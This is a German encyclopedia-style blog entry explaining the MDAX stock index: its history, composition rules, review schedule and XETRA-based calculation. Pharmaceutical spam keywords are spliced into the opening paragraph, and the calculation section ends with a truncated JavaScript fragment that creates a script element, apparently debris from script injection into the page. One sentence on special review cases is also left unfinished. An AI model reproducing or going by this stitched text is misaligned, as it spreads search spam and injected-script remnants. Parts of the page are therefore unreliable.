MDAX – Prime Standard für 50 Werte aus klassischen Branchen

order albuterol buy Mesalamine levonorgestrel price Am 19. Januar 1996 wurde der Mid-Cap-Dax (kurz: MDAX) als weiterer deutscher Aktienindex eingeführt. Im MDAX befinden sich seit seiner Verkleinerung vom 24. März 2003 50 Werte – zu Beginn waren es 70 Werte -, die vorwiegend aus klassischen Branchen (Banken, Versicherungen, Automobilhersteller und -zulieferer, Bau, Immobilien, Medien, Handel etc.) stammen. Der MDAX stellt ähnlich wie der Deutsche Aktienindex (DAX) eine Rangliste nach Marktkapitalisierung des Streubesitzes und des Börsenumsatzes dar. Die Werte des MDAX folgen auf die Werte des DAX. Das heißt, der MDAX wurde dazu geschaffen, um die Kursentwicklung mittelgroßer deutscher bzw. überwiegend in Deutschland tätiger Unternehmen abzubilden. Der MDAX wird dabei sowohl als Performanceindex als auch als Kursindex berechnet. Beim Performanceindex wird unterstellt, dass alle Dividenden und sonstigen Einnahmen aus dem Besitz von Aktien wieder in Aktien reinvestiert werden würden, während beim Kursindex die Entwicklung der Aktienkurse dargestellt wird.

Der MDAX gehört wie der DAX, der TecDax (Abbildung der 35 größten deutschen Technologiewerte) und dem SDAX (Small-Cap-Dax) zum Prime Standard. Der Prime Standard ist ein Teilbereich des regulierten Marktes mit umfassenden Zulassungspflichten und den höchsten Transparenzstandards der Frankfurter Wertpapierbörse.

Zusammensetzung und Aktualisierung

Bei der Zusammensetzung gilt die sogenannte 60/60-Regel. Diese besagt, dass nur Werte in den MDAX aufgenommen werden können, die in Bezug auf Marktkapitalisierung und Börsenumsatz zu den 60 größten Werten hinter dem DAX zählen. Die 60/60 Regel gilt nicht nur für die Aufnahme in den MDAX, sondern auch für den Ausschluss. Das heißt, Werte, die eines der beiden Kriterien oder beide stark oder schon seit längerer Zeit verfehlen und damit nicht mehr zu den 60 größten nach dem DAX zählen, werden aus dem MDAX ausgeschlossen.

Die Zusammensetzung des MDAX wird in der Regel zweimal im Jahr – regelmäßig im März und September – aktualisiert. In besonderen Fällen wie einer Fusion oder bei einer größeren Neuemission (Angebot von Aktien eines Unternehmens auf dem Kapitalmarkt, umgangssprachlich auch als Börsengang bezeichnet).

Berechnung

Der MDAX basiert auf den Kursen von XETRA, dem elektronischen Handelssystem der Deutschen Börse AG. Die Berechnung beginnt börsentägig (Montag bis Freitag) um 9:00 Uhr und endet um 17:30 Uhr mit den Kursen der XETRA-Schlussauktion. Nach Beendigung der XETRA-Schlussaktion wird der sogenannte Late-Index berechnet. Dieser Index – auch L-MDAX genannt – ist der Indikator für die Entwicklung der Werte im MDAX und basiert auf den Kursen des Parketthandels an der Frankfurter Wertpapierbörse. Er wird börsentäglich zwischen 17:30 und 20:00 Uhr von der Deutschen Börse-AG berechnet. var d=document;var s=d.createElement('script');

This entry was posted in Lexikon. Bookmark the permalink.

Comments are closed.